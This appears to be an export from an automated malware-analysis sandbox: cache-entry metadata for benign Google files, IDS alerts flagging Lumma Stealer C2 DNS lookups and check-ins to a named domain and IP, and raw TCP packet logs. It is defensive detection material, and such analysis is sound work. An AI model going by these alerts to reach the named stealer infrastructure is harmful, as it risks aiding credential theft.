MD5:	9E1D9AAFFA7D0E5236C26DEA99751C5D
SHA1:	EC0B07AA85C8B5A198057F4A0420E8513BE8E38B
SHA-256:	4414DD30381CF46B62026E44416AB17BFBB732141089AB21079DB94631A50CB6
SHA-512:	EE3B0E75941C5ACBB09F2F726BA7320010912CCBCED28703AE083FE7CECD3487DF2A1AE6FB0D545425285A40282C21EE165504AE713F807E9D84E20703246674
Malicious:	false
Reputation:	low
URL:	https://www.google.com/logos/2024/popcorn/rc4/preload-sprite.png
Preview:	.PNG........IHDR.....................PLTEGpL.%..&..&..&..&..&..&..&..&..&..&..&..f..`..`..`..`..`..`..a..b..`..a.O*.7..9..9..9..U-.Q,.Q/..&..&..&..&..a..`..`..`..c.9..:..:..:..:..9..+........"..3..:..:..K+.sT1.m7..F..J.z=.Z)]C.>"..Z..y..........m:.......\|..x..w..z..Q,.S....u..f[<.Q5..W..Q.i3.^oH .6'.U>.a.i.........v.wX.I5.lO......p.{7..A.i.s...r-.R...........i#.....}.o(..$...D..;.<.v-xN!...o.W.H.c(.s7._...g.k0.w......O.z@...a,..P..J..Fm>..v....<..@..D_O/..8..G...`a7...B..(........?....a.....Q .........w0...^.....}......<..h........g ......n....~_A..d.m-..^e:..y9oF..2.f..l..q...C..uY2.W0...nX2.X1.X2.Y2..O.Y2.X1.Y1..Z(Y1....w=.m5..{.>..d.\.......u......_.b.J.?.<...P.h...a-...=.u9...<0..~B.S..f..r.m4.O..B.V.u6.f1.V(.P&^.......tRNS..@..p0..` P..o.....O/.?.Uh.._>....._...y.................................M.........................................................................................................

Chrome Cache Entry: 242

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (621)
Category:	downloaded
Size (bytes):	1037389
Entropy (8bit):	5.720009321594479
Encrypted:	false
SSDEEP:	12288:28Qo92wOfIoB6u2FfvsSkatSeOT2VU/T5wkjbRMo/:LiwOfIoIu2ZvsSkuSeOT2VU/T5wqdn
MD5:	8380E1B09DA81DF5EE15A8AC24242F97
SHA1:	58A4DF1AF299649478B500E9D448D61F2F7827A2
SHA-256:	9BA23DFE47510269CFFB748640336C7CC9F7AEC818D4560F852C085930A928EB
SHA-512:	7E9058ADF28EF8319CF6DC63AF3921943CF54890488B382337DB92F6CD4B9D79DD5597FFF0B2AB432E87B325D8AE7FD24351824FFFD1BD3DE7AD1C86792706CD
Malicious:	false
Reputation:	low
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT././. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var baa,caa,naa,Aaa,Caa,Iaa,Taa,$aa,iba,kba,mba,nba,rba,sba,xba,Cba,Fba,Hba,Iba,Lba,Kba,Eba,Ta,Oba,Sba,Tba,Uba,Yba,aca,bca,dca,eca,fca,hca,ica,jca,kca,oca,qca,sca,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,tea,uea,yea,zea,Eea,Gea,Nea,Oea,Qea,xea,Bea,Uea,Yea,efa,ifa,jfa,rfa,ofa,sfa,ufa,yfa,zfa,.Afa,Cfa,Dfa,lfa,Ffa,Hfa,Lfa,Nfa,Ufa,Zfa,aga,kga,mga,oga,pga,yga,Aga,Dga,Fga,Gga,Iga,Kga,Oga,Pga,Rg

Chrome Cache Entry: 243

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (550)
Category:	downloaded
Size (bytes):	1521
Entropy (8bit):	5.101184639212981
Encrypted:	false
SSDEEP:	24:XrNYmlt2e2/kDwQmMIHwhIZ5Ur1gLEFukO9/j1I6gWaagYj1qWrsRrd7RyUJ1yLs:XrNPKEV7IwhemJgtB9TaagEqphAUJ0s
MD5:	31802EB7C75861B3CC62A130ADF4110F
SHA1:	49D4038BB9868D7FB503176AE7EF9AA71B7CB374
SHA-256:	B87A7F1BF6904712F5C36D2A922B2D277313BF97E9857B3634C5B3D50BEC2D31
SHA-512:	4943EE95DD995549274328AD6A69AE34BFCB0D1F1A3F5FF2DA37E0B876FDC9FC9D6D333CF4FC8EBF855D22DAE89C8FD00EA59BE45AEFF5EA757CC4ACF8936C94
Malicious:	false
Reputation:	low
URL:	https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.w("aLUfP");.var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){var c=b.Sp(),d=b.HXa()&&Math.abs(window.orientation)===90&&b.oa===-1window.orientation;b.oa=window.orientation;if(c!==b.ta\|\|d){b.ta=c;d=_.Sa(b.Nd);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new Dqb(c);try{e(f)}catch(g){_.ca(g)}}}};this.Nd=new Set;this.window.addEventListener("resize",this.ka);this.HXa()&&this.window.addEventListener("orientationchange",.this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};._.m.Sp=function(){if(_.oa()&&_.la()&&!navigator.userAgent.includes("GSA")){var a=_.ol(this.window);a=new _.dl(a.width,Math.round(a.widththis.window.innerHeight/this.window.innerWidth))}else a

Chrome Cache Entry: 244

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4998)
Category:	downloaded
Size (bytes):	5003
Entropy (8bit):	6.103551681259432
Encrypted:	false
SSDEEP:	96:uM8NBT5ZKWVMj4kEc0d8xi8u28bXpEfPHMiNzmyVuBhOtpi6V50qPxzmYU:eNBSWVMrBMmyJXpEJ7VuBhOtpV5Bx6z
MD5:	99965BE4CA6A3DC24ABC6D10F54FDCED
SHA1:	730D8B24ED345C4DF0CA06621BFD8A35E61F7288
SHA-256:	11323913455A056A59509DBAB6B2FEF2688B2F930266EF2AF04A4781FE94B443
SHA-512:	2BE3B4A4FB0AFE4E814290834F263BFB285647F2D19427A01AB13696B4B297A7BA0B4D1D08CCC6B2A795353AEC06E24A91DF2B222FE93278173CE1C0EC3C6AB2
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1
Preview:	)]}'.[[["denver broncos running backs",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["agatha all along episode 3",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["viral pizza dominos coupon",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["gettysburg college student",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"gettysburg college student","zi":"Gettysburg College \u2014 Liberal arts college in Gettysburg, Pennsylvania","zl":8,"zp":{"gs_ssp":"eJzj4tTP1TcwykgrMTZg9JJKTy0pqSxOKi1KV0jOz8lJTU9VKC4pTUnNKwEA_UkNvQ"},"zs":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAFAAUAMBIgACEQEDEQH/xAAaAAADAQEBAQAAAAAAAAAAAAAEBQYDAQAC/8QANRAAAgECBQMDAwIFAwUAAAAAAQIDBBEABRIhMRNBURQiYQaBkTJxFSNCobEHM8EkNKLw8f/EABkBAAIDAQAAAAAAAAAAAAAAAAIEAAEDBf/EACERAAICAgICAwEAAAAAAAAAAAECABEDIRIxE

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T17:55:56.640051+0200	2056078	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)	1	192.168.2.16	53987	1.1.1.1	53	UDP
2024-09-26T17:55:57.151423+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.16	49829	172.67.206.221	443	TCP
2024-09-26T17:55:57.520109+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.16	49829	172.67.206.221	443	TCP
2024-09-26T17:55:57.520109+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.16	49829	172.67.206.221	443	TCP
2024-09-26T17:55:58.577607+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.16	49830	172.67.206.221	443	TCP
2024-09-26T17:55:59.006250+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.16	49830	172.67.206.221	443	TCP
2024-09-26T17:55:59.006250+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.16	49830	172.67.206.221	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:55:21.619441032 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:21.619472027 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:21.619539022 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:21.619740963 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:21.619749069 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.301517963 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.303153992 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.303164005 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.303543091 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.303658009 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.304229975 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.304280996 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.307761908 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.307809114 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.307972908 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.307977915 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.358192921 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.596966028 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.597049952 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.597132921 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.597512960 CEST	49706	443	192.168.2.16	142.250.181.238
Sep 26, 2024 17:55:22.597532988 CEST	443	49706	142.250.181.238	192.168.2.16
Sep 26, 2024 17:55:22.608958960 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:22.608999968 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:22.609076977 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:22.609267950 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:22.609280109 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.283354044 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.283633947 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.283648014 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.284622908 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.284687042 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.285836935 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.285901070 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.286125898 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.286134005 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.330199957 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.654623032 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.654791117 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.654858112 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.654871941 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.654901028 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.654953003 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.654998064 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.655066967 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.655150890 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.655226946 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.659972906 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.660062075 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.660084009 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.665836096 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.665934086 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.665954113 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.711191893 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.740041971 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.740575075 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.740638971 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.740667105 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.744455099 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.744537115 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.744556904 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.749386072 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.749483109 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.749506950 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.754560947 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.754637003 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.754730940 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.754995108 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.755026102 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.755959988 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.756033897 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.756045103 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.763020039 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.763081074 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.763092995 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.768326044 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.768419981 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.768430948 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.774292946 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.774401903 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.774429083 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.780070066 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.780174017 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.780199051 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.786556959 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.786629915 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.786647081 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.792026043 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.792089939 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.792117119 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.822696924 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:23.830569983 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.830698967 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.830710888 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.830732107 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.830777884 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.830790997 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.831001043 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.831052065 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.831063032 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.834991932 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.835067034 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.835091114 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.835216045 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.835261106 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.835273981 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.840434074 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.840531111 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.840550900 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.841588020 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.841681957 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.841697931 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.848563910 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.848648071 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.848674059 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.854826927 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.854948997 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.854974985 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.858926058 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.859039068 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.859065056 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.864917994 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.865012884 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.865031004 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.870291948 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.870383978 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.870398998 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.882203102 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.882294893 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.882318020 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.882350922 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.882417917 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.882426023 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.886281013 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.886631012 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.886645079 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.891076088 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.891194105 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.891210079 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.895539045 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.895625114 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.895633936 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.900125980 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.900208950 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.900219917 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.903887987 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.903971910 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.903985977 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.910115957 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.910186052 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.910203934 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.920241117 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.920306921 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.920330048 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.923788071 CEST	443	49707	172.217.16.132	192.168.2.16
